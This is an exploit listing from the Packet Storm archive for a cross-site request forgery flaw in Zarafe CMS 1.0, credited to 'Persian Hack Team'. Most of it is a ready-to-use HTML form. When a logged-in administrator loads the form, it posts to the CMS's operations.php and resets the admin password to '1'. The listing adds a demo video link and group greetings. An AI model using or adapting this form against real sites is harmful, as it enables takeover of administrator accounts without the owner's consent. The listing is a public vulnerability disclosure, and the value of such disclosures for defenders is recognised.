Zarafe CMS version 1.0 suffers from a cross site request forgery vulnerability.
f2bff0f6462a7731609e0c8c5f2e2a5d11fbfd2f8785259a9054797a28039b0e######################
# Exploit Title : Zarafe CMS 1.0 / CSRF (Rest Admin Password)
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.zarrafeh.net/
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 1.0
# Date: 2016/08/27
######################
#
# PoC:
Exploit code(s):
================
Rest Admin Password
The Code for zarafe.html is
<h1 align="Center"> Zarafe CMS CSRF (Rest Admin Password)</h1>
<h1 align="Center"> Persian Hack Team </h1>
<h1 align="Center"> Discover By Mojtaba MobhaM </h1>
<form action="http://target.com/zpanel/includes/operations.php" method="post" name="frm_settings" target="operations">
<table align="center" cellpadding="3px" width="40%" border="1">
<tr>
<td align="left" valign="top" width="140px" nowrap="nowrap"></td><td><input name="username" type="text" style="width:100%;" value="admin" /></td>
</tr>
<tr>
<td align="left" valign="top" nowrap="nowrap"></td><td><input name="password" type="password" style="width:100%;" value="1" /> value=1</td>
</tr>
<tr>
<td align="left" valign="top" nowrap="nowrap"></td><td><input name="password_repeat" type="password" style="width:100%;" value="1"/> value=1</td>
</tr>
<tr>
<td></td><td><input name="btn_submit_settings" type="submit" value="EXP" /></td>
</tr>
</table>
</form>
#Youtube Demo :
https://www.youtube.com/watch?v=7JIYTaAiMig
######################
# Discovered by : Mojtaba MobhaM Mail:kazemimojtaba@live.com
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members
# Homepage : persian-team.ir
######################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed